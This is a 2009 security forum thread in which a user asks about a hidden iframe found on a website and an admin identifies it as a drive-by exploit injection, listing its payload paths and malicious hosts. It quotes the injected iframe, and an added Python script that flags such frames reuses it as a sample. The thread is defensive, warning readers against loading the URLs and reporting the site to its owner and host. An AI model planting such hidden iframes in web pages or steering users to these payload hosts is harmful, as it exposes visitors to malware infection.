Iframe Question

Mystery
Posts: 232
Joined: Fri Jul 10, 2009 7:56 am
Gender: Female
experience: Not only can I turn PC on, I know most of its functions too
PC time: Alot more than I should
Location: Switzerland
Contact:

Iframe Question

Postby Mystery » Mon Aug 17, 2009 4:47 pm

I didn't find another place on the forums to post this question. Anyhow, I would like to know what an iframe like this is. Does it connect to an IRC server? I've caught it on a "trusted" site because I'm using NoScript and forbid iframes, so it has shown up as an icon (blocked item) for me.
<iframe src="http://3f9.ru:8080/index.php" width=103 height=109 style="visibility: hidden"></iframe>


Thanks for a reply in advance :)
Why do geeks think Halloween and Christmas occur on the same day?
Because 31oct = 25dec ;)

MysteryFCM
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Iframe Question

Postby MysteryFCM » Mon Aug 17, 2009 5:58 pm

That's an exploit ;)

Payload comes via;

/cache/readme.pdf
/cache/load.php
/cache/flash.swf

Note: DO NOT load these or the above URL in a browser!!!
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!
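
As an added example (not part of the original thread): a site owner's check for the pattern discussed above, an iframe that points off-site and is also hidden or served from an unusual port. The function names, the host `example.org` and the sample page are assumptions constructed for illustration; the HTML is only parsed as text and nothing is fetched.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

HIDING_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

class IframeAudit(HTMLParser):
    """Collects off-site iframes that are also concealed or on an odd port."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        url = urlsplit(a.get("src", ""))
        host = (url.hostname or "").lower()
        same_site = host == self.page_host or host.endswith("." + self.page_host)
        if not host or same_site:
            return  # relative or same-site frame: out of scope for this check
        try:
            port = url.port
        except ValueError:  # malformed port in the src attribute
            port = -1
        # Leading integer of width/height, when the attribute is present.
        dims = [int(m.group(1)) for v in (a.get("width"), a.get("height"))
                if (m := re.match(r"\s*(\d+)", v or ""))]
        signals = []
        if HIDING_CSS.search(a.get("style", "")):
            signals.append("hidden by CSS")
        if any(d <= 1 for d in dims):
            signals.append("0/1px size")
        if port not in (None, 80, 443):
            signals.append("non-standard port")
        if signals:
            self.findings.append((a["src"], signals))

def audit(html, page_host):
    """Return [(src, [signals])] for suspicious iframes in one page's HTML."""
    parser = IframeAudit(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page; the second iframe is the one quoted in the thread.
SAMPLE = """<html><body>
<iframe src="https://video.example.net/embed/1" width="560" height="315"></iframe>
<iframe src="http://3f9.ru:8080/index.php" width=103 height=109 style="visibility: hidden"></iframe>
</body></html>"""
```

This inspects static markup only, so a frame written into the page by script at load time will not appear in the results.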

Re: Iframe Question

Postby MysteryFCM » Mon Aug 17, 2009 6:00 pm

This particular one has the payload itself coming from;

Code:

bestlitediscover.cn:8080/landig.php?id=8


Again, DO NOT load this in a browser.

Ref:
http://wepawet.cs.ucsb.edu/view.php?has ... 22&type=js

Re: Iframe Question

Postby Mystery » Mon Aug 17, 2009 6:09 pm

Thanks a lot for your quick reply and all the info! :D
I did a search but couldn't find anything about it.

Yeah, I thought it was malicious. This is why I'm blocking iframes, and don't add general exceptions to any sites as they can be compromised.

I informed the website owner by email as soon as I spotted it because it was clear to me that it shouldn't be there, but I have no idea how long it will take until they read it and take any steps. And this site is frequented by many people... :(

Anyhow, I appreciate your clarifications on this chrz

Re: Iframe Question

Postby MysteryFCM » Mon Aug 17, 2009 6:16 pm

No problem :)

Re: Iframe Question

Postby Mystery » Mon Aug 17, 2009 7:12 pm

Thanks to whoever has moved this topic to a more suitable subforum :)

Btw, could you please additionally tell me how dangerous it is to visit this compromised website for a user who does not block any scripts? :?
If it's dangerous and the website owner doesn't reply to me by tomorrow, I might try to do some alerting of users.

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 7:24 am

Given the exploits, it's extremely dangerous.

Re: Iframe Question

Postby Mystery » Tue Aug 18, 2009 6:46 pm

Darn! grgr I have to think about a way to protect visitors, I can't just sit back knowing about this :?

Thanks again MysteryFCM :)

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 6:51 pm

Which site is currently serving this?

Re: Iframe Question

Postby Mystery » Tue Aug 18, 2009 6:59 pm

http://www.rabbittell.com/
(made link unclickable)

As far as I have seen, only the main page is infected; the other pages are not.
I emailed both people who are running this site, no reply yet. Given their inactivity since April, I don't know when and if they will see my email.
The site is registered on GoDaddy.com. This is what I've figured out so far.

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 7:08 pm

The site is also hosted by GoDaddy, though I'd be surprised if you got them to respond, let alone actually take action to clean it up or anything;

http://hosts-file.net/?s=208.109.181.133

Have you tried the contact address listed in the WhoIs?

http://hosts-file.net/?s=rabbittell.com&wn=1

I've checked the other pages on the site and it does indeed look like it's only the front page that's affected at present, which leads me to believe the attacker got in via FTP (which then of course, begs the question of why it's only the front page that's affected);

http://vurl.mysteryfcm.co.uk/?url=822892

I'll fire off an e-mail to both the address listed on contact.php and the one listed in the WhoIs, and fire off an e-mail to GoDaddy too (for all the good it'll do, they have a tendency to completely ignore abuse reports).

Re: Iframe Question

Postby Mystery » Tue Aug 18, 2009 7:16 pm

I think that the email listed in the Whois is a very old one, but despite that I tried it.
Also the official contact email address of Rabbit Tell, and the official contact email of Bruno Maestrini's website that I have found.

Yes, I have heard that GoDaddy doesn't do much about reports, therefore I haven't done this. But since I haven't got a reply to my emails, I thought of trying it nonetheless now.

Thank you for all your support in this! :D

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 7:22 pm

Just for kicks n giggles btw, this domain also happens to share its IP with at least one other malicious domain, and is on a range with a slew of other malicious domains;

http://hosts-file.net/?s=208.109.181.133&view=matches

Re: Iframe Question

Postby Mystery » Tue Aug 18, 2009 7:31 pm

Wouldn't it be true for all cheap hosted domains nowadays? ?>!
I mean the number of new malicious domains is growing like mushrooms after rain...

Lol, I just checked my own website's pages... Phew, nothing.
Last edited by Mystery on Tue Aug 18, 2009 7:39 pm, edited 1 time in total.

Re: Iframe Question

Postby MysteryFCM » Tue Aug 18, 2009 7:38 pm

Sadly, yep. Thankfully there are still some hosting co's that will respond, and take down malicious sites found on their networks though ;)

Re: Iframe Question

Postby Mystery » Thu Aug 20, 2009 6:20 am

That's true :)

I'm glad to see that it has been added as a reported attacker site for now, this will prevent a number of people from visiting it.

Re: Iframe Question

Postby MysteryFCM » Thu Aug 20, 2009 6:57 am

It was added to hpHosts too :)

Sadly, there's been absolutely no response from either the domain owner, or the hosting co.

Re: Iframe Question

Postby Mystery » Thu Aug 20, 2009 7:21 am

Yup, I've seen that it's on the hpHosts list, too. :)

Yeah, neither did I receive any response...